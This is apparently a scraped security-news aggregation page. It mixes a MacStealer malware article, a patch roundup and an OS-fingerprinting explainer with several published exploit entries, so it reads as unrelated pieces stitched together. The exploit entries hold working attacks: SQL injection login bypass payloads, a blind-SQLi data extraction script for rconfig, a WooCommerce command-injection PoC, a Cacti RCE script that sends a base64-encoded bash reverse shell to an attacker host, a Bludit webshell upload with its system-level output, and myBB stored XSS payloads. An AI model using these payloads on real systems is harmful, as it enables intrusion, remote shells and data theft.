Categories: Apple
Categories: News
Tags: MacStealer

Tags:  mac infostealer

Tags:  information stealer

Tags:  Apple

Tags:  Thomas Reed

Tags:  iCloud Keychain

MacStealer could be an infamous stealer in the making, but right now, it needs improvement, according to Malwarebytes expert.



(Read more...)




The post New macOS malware steals sensitive info, including a user's entire Keychain database appeared first on Malwarebytes Labs.

A new macOS malware—called MacStealer—that is capable of stealing various files, cryptocurrency wallets, and details stored in specific browsers like Firefox, Chrome, and Brave, was discovered by security researchers from Uptycs, a cybersecurity company specializing in cloud security. It can also extract the base64-encoded form of the database of Keychain, Apple's password manager. Users of macOS Catalina (10.5) and versions dependent on Intel M1 and M2 are affected by this malware.

And while MacStealer appears to be _the_ mac malware to watch, it is pretty rudimentary, according to Thomas Reed, Malwarebytes' director of core technology. "There is no persistence method, and it relies on the user opening the app," he adds, considering the foreseeable features the developer wants to add to MacStealer in the future.

MacStealer uses channels in Telegram as its command-and-control (C2) center. The malware has been promoted on a dark web forum since the beginning of March. According to the developers, it's still in the early beta stage, thus lacking a builder and panel. These are also why the developers distribute MacStealer as a malware-as-a-service (MaaS), selling at a low price of $100 and promising more advanced features in the future.

MacStealer arrives to target macOS systems as an unsigned disk image (.DMG) file. Users are manipulated to download and execute this file onto their systems. Once achieved, a bogus password prompts users in an attempt to steal their real password. MacStealer then saves the password in the affected system's temporary folder (TMP).

The malware then proceeds to collect and save the following also within the TMP folder:

*   Account passwords, browser cookies, and stored credit card details in Firefox, Chrome, and Brave
*   Cryptocurrency wallets (Binance, Coinomi, Exodus, Keplr Wallet, Martian Wallet, MetaMask, Phantom, Tron, Trust Wallet)
*   Keychain database in its encoded (base64)form
*   Keychain password in text format
*   Various files (.TXT, .DOC, .DOCX, .PDF, .XLS, .XLSX, .PPT, .PPTX, .JPG, .PNG, .CVS, .BMP, .MP3, .ZIP, .RAR, .PY, .DB)
*   System information in text form

MacStealer also compresses everything it stole in a ZIP file and sends it to remote C&C servers for the threat actor to collect later. At the same time, a summary version of the information it stole is sent to pre-configured Telegram channels, alerting the threat actor that new stolen data is available for download.

  
A data summary of what has been stolen by MacStealer. The threat actors receive this on their personal Telegram bot. (Source: Uptycs)

MacStealer being an unsigned DMG file is also a barrier for anyone, especially beginners, attempting to run the program on a modern mac, said Malwarebytes' Reed. "Its attempt at phishing for login passwords is not very convincing and would probably only fool a novice user. But such a user is exactly the type who would have trouble opening it."

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

New macOS malware steals sensitive info, including a user's entire Keychain database

Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for login bypass.

    # Exploit Title: Judging Management System v1.0 - Authentication Bypass# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP server# Vulnerability: An attacker can bypass login page and access to dashboard page# Vulnerable file: login.php# Exploit:1) Go to: http://localhost/php-jms/index.php2) As username use this payload: 'or 1=1-- -3) Use random words for passwordPOST /php-jms/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Origin: http://localhostConnection: closeReferer: http://localhost/php-jms/index.phpCookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=%27or+1%3D1--+-&password=asa

Judging Management System 1.0 SQL Injection

EQ Enterprise Management System version 2.2.0 suffers from a remote SQL injection vulnerability.

    Exploit Title: EQ Enterprise management system v2.2.0 - SQL InjectionDate: 2022.12.7Exploit Author: TLFVendor Homepage: https://www.yiquantech.com/pc/about.htmlSoftware Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/Version: EQ v1.5.31 to v2.2.0Tested on: windows 10CVE : CVE-2022-45297 POC:POST /Account/Login HTTP/1.1 Host: 121.8.146.131 User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 118 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg Origin: http://121.8.146.131Referer: http://121.8.146.131/Account/Login X-Requested-With: XMLHttpRequest Accept-Encoding: gzipRememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27

EQ Enterprise Management System 2.2.0 SQL Injection

rconfig version 3.9.7 suffers from a remote SQL injection vulnerability.

    # Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)# Exploit Author: azhen# Date: 10/12/2022# Vendor Homepage: https://www.rconfig.com/# Software Link: https://www.rconfig.com/# Vendor: rConfig# Version: <= v3.9.7# Tested against Server Host: Linux# CVE: CVE-2022-45030import requestsimport sysimport urllib3urllib3.disable_warnings()s = requests.Session()# sys.argv.append("192.168.10.150") #Enter the hostnameif len(sys.argv) != 2:    print("Usage: python3 rconfig_sqli_3.9.7.py <host>")    sys.exit(1)host=sys.argv[1] #Enter the hostnamedef get_data(host):    print("[+] Get db data...")    vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"    query_exp = "database()"    result_data = ""    for i in range(1, 100):        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}        res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)        # print(res.text)        a = chr(int(res.text[6:10]) - 1000)        if a == '\x00':            break        result_data += a                print(result_data)        print("[+] Database name: {}".format(result_data))    '''    output:    [+] Logging in...    [+] Get db data...    r    rc    rco    rcon    rconf    rconfi    rconfig    rconfigd    rconfigdb    [+] Database name: rconfigdb            '''def login(host):    print("[+] Logging in...")    url = "https://"+host+":443/lib/crud/userprocess.php"    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}        data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin    response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)    get_data(host)login(host)

rconfig 3.9.7 SQL Injection

WordPress WooCommerce plugin version 7.1.0 suffers from a remote code execution vulnerability.

    # Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)# Date: 2022-12-07# Author: Milad Karimi# Vendor Homepage: https://wordpress.org/plugins/woocommerce# Software Link: https://wordpress.org/plugins/woocommerce# Tested on: windows 10 , firefox# Version: 7.1.0# CVE : N/A# Description:simple, easy to use jQuery frontend to php backend that pings variousdevices and changes colors from green to red depending on if device isup or down.# PoC :http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.phphttp://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php# Vulnerabile code: 95: $classname $classname($post_id);   94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');     92: ⇓ function save($post_id, $post)       93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));           92: ⇓ function save($post_id, $post)

WordPress WooCommerce 7.1.0 Remote Code Execution

Cacti version 1.2.22 suffers from a remote command execution vulnerability.

    # Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)# Exploit Author: Riadh BOUCHAHOUA# Discovery Date: 2022-12-08 # Vendor Homepage: https://www.cacti.net/# Software Links : https://github.com/Cacti/cacti# Tested Version: 1.2.2x <= 1.2.22# CVE: CVE-2022-46169# Tested on OS: Debian 10/11#!/usr/bin/env python3import randomimport httpx, urllibclass Exploit:    def __init__(self, url, proxy=None, rs_host="",rs_port=""):        self.url = url         self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)        self.rs_host = rs_host        self.rs_port = rs_port    def exploit(self):        # cacti local ip from the url for the X-Forwarded-For header        local_cacti_ip  = self.url.split("//")[1].split("/")[0]            headers = {            'X-Forwarded-For': f'{local_cacti_ip}'        }                revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"        import base64        b64_revshell = base64.b64encode(revshell.encode()).decode()        payload = f";echo {b64_revshell} | base64 -d | bash -"        payload = urllib.parse.quote(payload)        urls = []                # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)        for host_id in range(1,100):            for local_data_ids in range(1,100):                urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")                        for url in urls:            r = self.session.get(url,headers=headers)            print(f"{r.status_code} - {r.text}" )        pass    def random_user_agent(self):        ua_list = [            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",        ]        return random.choice(ua_list)def parse_args():    import argparse        argparser = argparse.ArgumentParser()    argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")    argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)    argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)    return argparser.parse_args()def main() -> None:    # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL     args = parse_args()    e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)    e.exploit()if __name__ == "__main__":    main()

Cacti 1.2.22 Remote Command Execution

Bludit version 3-14-1 suffers from a remote shell upload vulnerability.

    # Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.bludit.com/# Version : 3-14-1# Tested on: windows 11 wampserver | Kali linux# Category: WebApp# Google Dork: intext:'2022 Powered by Bludit'# Date: 8.12.2022######## Description ##########  Step 1 : Archive as a zip your webshell (example: payload.zip)#  Step 2 : Login admin account and download 'UploadPlugin'#  Step 3 : Go to UploadPlugin section#  Step 4 : Upload your zip#  Step 5 : target/bl-plugins/[your_payload]######### Proof of Concept ########==============> START REQUEST <========================================POST /admin/plugin/uploadplugin HTTP/2Host: localhostCookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264Content-Length: 1820Origin: https://036e-88-235-222-210.eu.ngrok.ioDnt: 1Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadpluginUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="tokenCSRF"b6487f985b68f2ac2c2d79b4428dda44696d6231-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="pluginorthemes"plugins-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="zip_file"; filename="a.zip"Content-Type: application/zipPK    †eˆU               a/PK   ”fˆUÆ  ª)¢  Ä      a/a.phpíVÛŽÓ0}ç+La BÛìVÜ–pX®ËJ @Vêº­!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/.&nbsp;pÝãZ+M5/•¶BÎÈ0>©M†[jÅ‚ÓB,„õtOÌ¤Òœ.×4;’†e)¨ƒ¼È×”¯9[Z¡dðÆ  „Œ&Âd<ó`÷+œN—’y¼ÁRLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“j±u\õ„±†à/ï¾ÎÞž´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þÇ¸0yÕU¥H"ÕÕÿI  IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç  Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj.îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ïe8©ô*Ô¾"ý¡@Ó2+ëÂ`÷kC57j©'Î"m ã®ho¹ xŸô Û;’œcçzÙQË·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ  ØIÏ²òÖ`Ð:%F½$A"t;buOMr4Ýè~–eãÎ™åØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~tÂ6á¾,…ÅèçO´ÇÆ×Î£v²±ãÿbÃ‘Ú’‘Ug[;pq›eÓÜÅØÿéJË}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK?    †eˆU             $       €íA    a/          þš®,Ù þš®,Ù€ø¨j.ÙPK?   ”fˆUÆ  ª)¢  Ä    $        €¤    a/a.php          ¤eÝ-Ù ÷C-Ù bj.ÙPK      ­   ç    -----------------------------308003478615795926433430552264Content-Disposition: form-data; name="submit"Upload-----------------------------308003478615795926433430552264--==============> END REQUEST <========================================## WEB SHELL UPLOADED!==============> START RESPONSE <========================================HTTP/2 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html; charset=UTF-8Date: Thu, 08 Dec 2022 18:01:43 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTNgrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4Pragma: no-cacheServer: Apache/2.4.51 (Win64) PHP/7.4.26X-Powered-By: Bludit....==============> END RESPONSE <========================================# REQUEST THE WEB SHELL==============> START REQUEST <========================================GET /bl-plugins/a/a.php?cmd=whoami HTTP/2Host: localhostCookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailers==============> END REQUEST <======================================================> START RESPONSE <========================================HTTP/2 200 OKContent-Type: text/html; charset=UTF-8Date: Thu, 08 Dec 2022 18:13:14 GMTNgrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919Server: Apache/2.4.51 (Win64) PHP/7.4.26X-Powered-By: PHP/7.4.26Content-Length: 32<pre>nt authority\system</pre>==============> END RESPONSE <========================================

Bludit 3-14-1 Shell Upload

Plus: Microsoft Outlook and Android patch serious flaws, Chrome and Firefox get fixes, and much more.

Meanwhile, researchers at Google’s Project Zero have reported 18 zero-day vulnerabilities in Exynos Modems made by Samsung. The four most severe—CVE-2023-24033, CVE-2023-26496, CVE-2023-26497, and CVE-2023-26498—allow internet-to-baseband remote code execution, the researchers wrote in a blog. “Tests conducted by Project Zero confirm that the four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim’s phone number,” they wrote. 

Affected devices include those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12, and A04 series, as well as Google’s Pixel 6 and Pixel 7 series.

Patch timelines will vary per manufacturer, but affected Pixel devices have received a fix for all four of the severe internet-to-baseband remote code execution vulnerabilities. In the meantime, users with affected devices can protect themselves by turning off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings, Google said.

Google Chrome 

Google has released Chrome 111 of its popular browser, fixing eight security flaws, seven of which are memory safety bugs with a high severity rating. Four use-after-free vulnerabilities include a high-severity issue tracked as CVE-2023-1528 in Passwords and CVE-2023-1529, an out-of-bounds memory access flaw in WebHID.

Meanwhile, CVE-2023-1530 is a use-after-free bug in PDF reported by the UK’s National Cyber Security Centre, and CVE-2023-1531 is a high-severity use-after-free vulnerability in ANGLE.

None of the issues are known by Google to have been used in attacks, but given their impact, it makes sense to update Chrome when you can.

Cisco

Enterprise software giant Cisco has published the twice-yearly security bundle for its IOS and IOS XE Software, fixing 10 vulnerabilities. Six of the issues fixed by Cisco are rated as having a high impact, including CVE-2023-20080, a denial of service flaw, and CVE-2023-20065, a privilege escalation bug.

At the start of the month, Cisco fixed multiple vulnerabilities in the web-based management interface of some Cisco IP Phones that could allow an unauthenticated, remote attacker to execute arbitrary code or cause denial of service. With a CVSS score of 9.8, the worst is CVE-2023-20078, a vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800, and 8800 series multiplatform phones. 

An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface, Cisco said, adding, “A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system of an affected device.”

Firefox

Privacy-conscious developer Mozilla has released Firefox 111, fixing 13 vulnerabilities, seven of which are rated as having a high impact. These include three flaws in Firefox for Android, including CVE-2023-25749, which may have resulted in third-party apps opening without a prompt.

Meanwhile, two memory safety bugs, CVE-2023-28176 and CVE-2023-28177, have been fixed in Firefox 111. “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla said.

SAP

It’s another month of big updates for software maker SAP, which has released 19 new security notes in its March Security Patch Day guidance. Issues fixed during the month include four with a CVSS score of over 9. 

One of the worst of these is CVE-2023-25616, a code injection vulnerability in SAP Business Objects Business Intelligence Platform. This vulnerability in the Central Management Console allows an attacker to inject arbitrary code with a “strong negative impact” on the integrity, confidentiality, and availability of the system, security firm Onapsis said.

Finally, with a CVSS score of 9.9, CVE-2023-23857 is an improper access control bug in SAP NetWeaver AS for Java. “The vulnerability allows an unauthenticated attacker to attach to an open interface and make use of an open naming and directory API to access services,” Onapsis said.

Apple's iOS 16.4: Security Updates Are Better Than a Goose Emoji

Network protocols can be used to identify operating systems and discern other device information.

Network security and asset management products have to be able to identify what operating systems are currently running in the organization. With this information, IT and security departments gain greater visibility and control over their networks.

Device and operating system information is trivial to collect if the device has a software agent installed. However, agents are not an option for some operating systems, especially those installed on embedded and Internet of Things devices. This is where passive OS fingerprinting comes in handy, since passive methods don't require installing software on devices and work for most operating systems. Passive OS fingerprinting involves matching uniquely identifying patterns in the host's network traffic and classifying the traffic accordingly. Several protocols from different network layers can be used for OS fingerprinting: MAC addresses, TCP/IP parameters, HTTP User-Agent strings, and DHCP requests.

The Open Systems Interconnection (OSI) model contains several protocols for the application, transport, network, and data link layers. As a rule of thumb, protocols at the lower levels of the OSI stack — such as MAC and IP — provide better reliability with lower granularity compared with those on the upper levels of stack, and vice versa. Let's start at the bottom of the stack and move up.

**Start at the MAC Address**

The medium access control (MAC) protocol uses a unique physical identifier hardcoded into the device during manufacturing. The 12-digit hexadecimal number — the MAC address — is commonly written out as six pairs divided by hyphens. The left most six-digit long string represents the manufacturer's unique identifier and the right most six represent the serial number of the device's network interface card. For example, the six left-most digits of a MacBook laptop's MAC address would be 88:66:5a, which is the string affiliated with Apple.

By looking at the manufacturer's unique identifier, network administrators can infer the type of device running in the network and, in some cases, even the operating system.

**TCP/IP Tells Tales**

The TCP/IP stack is a more granular source of information. Most operating systems set unique values in the parameters within the packet headers, making it possible to identify the OS by looking at these values. Some of the most common parameters used in OS fingerprinting are initial time to live (TTL), Windows Size, "Don't Fragment" flag, and TCP options (values and order). For example, if a device has an outgoing packet's IP header with the "Don't fragment" flag set, TTL with the value of 64, Windows size of 65535, and a specific set of TCP options (02, 01, 03, 01, 01, 08, 04, 00), that's enough to identify it as running MacOS.

**HTTP Has a Wealth of Info**

Several protocols in the application layer are also useful for identifying the device's operating system type and the exact version or distribution. In some cases, these fields can be configured by the user and, thus, are less reliable.

The most common application protocol used in OS fingerprinting is HTTP, via the header's User-Agent field. The field, added by the application (such as a Web browser), includes information such as the application, operating system, and underlying device of the client. For example, the HTTP request to the server could contain a User-Agent field that identifies the client as a Firefox browser running on a Windows 7 OS: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0.

The User-Agent field is not the only indicator the HTTP protocol contains. Most operating systems have a built-in connectivity test that automatically runs when the device connects to a public network. For example, Network Connectivity Status Indicator (NCSI), an Internet connection awareness protocol in Microsoft's Windows operating systems, consists of a sequence of specifically crafted DNS and HTTP requests and responses that indicate if the host is located behind a captive portal or a proxy server.

**DHCP Identifies Hosts**

The DHCP protocol, used for IP assignment over the network, provides several indicators that can be used to identify the host. DHCP is composed of 4 steps: discovery, offer, request, and acknowledge (DORA). For example, a Windows host broadcasting DHCP messages over the local network and receiving replies from the DHCP server will be sending a unique vendor class identifier "MSFT 5.0," and the parameter request list would contain a sequence of values common to Windows hosts.

Combined with the order of the DHCP options themselves, the indicators are sufficient to identify the host as a Windows OS.

**Wrapping Up**

While some protocols provide better accuracy than others, there is no "silver bullet" for the task of OS identification, and the different options provide different types of information. Rather than fingerprinting based on a single protocol, you might consider a multiprotocol approach, such as combining the HTTP User-Agent with lower-level TCP options.

How to Solve IoT's Identity Problem

myBB forums version 1.8.26 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)   
# Exploit Author: Andrey Stoykov  
# Software Link: https://mybb.com/versions/1.8.26/  
# Version: 1.8.26  
# Tested on: Ubuntu 20.04

Stored XSS #1:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> =  
"Global Templates"=20  
3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp=  
late HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing

// HTTP redirect response to specific template

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title=  
=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1  
[...]

// HTTP GET request to newly created template

GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

<tr class=3D"first">  
<td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio=  
n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3=  
E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td>  
[...]

Stored XSS #2:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Management"  
3. Select "Add New Forum" and enter payload "><script>alert(1)</script>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP=  
/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a=  
lert(1)</script>&description=3D"><script>alert(2)</script[...]

// HTTP response showing successfully added a new forum

HTTP/1.1 200 OK  
Date: Sun, 20 Nov 2022 11:00:28 GMT  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forums

GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<small>Sub Forums:  <a href=3D"index.php?module=3Dforum-management&fid=  
=3D3">"><script>alert(1)</script></a></small>

Stored XSS #3:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Announcements"  
3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H=  
TTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202=  
2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea=  
r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert=  
(2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1

// HTTP response showing successfully added an anouncement

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forum URL

GET /mybb_1826/ HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>=  
</a>

--sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d--

Tag

#firefox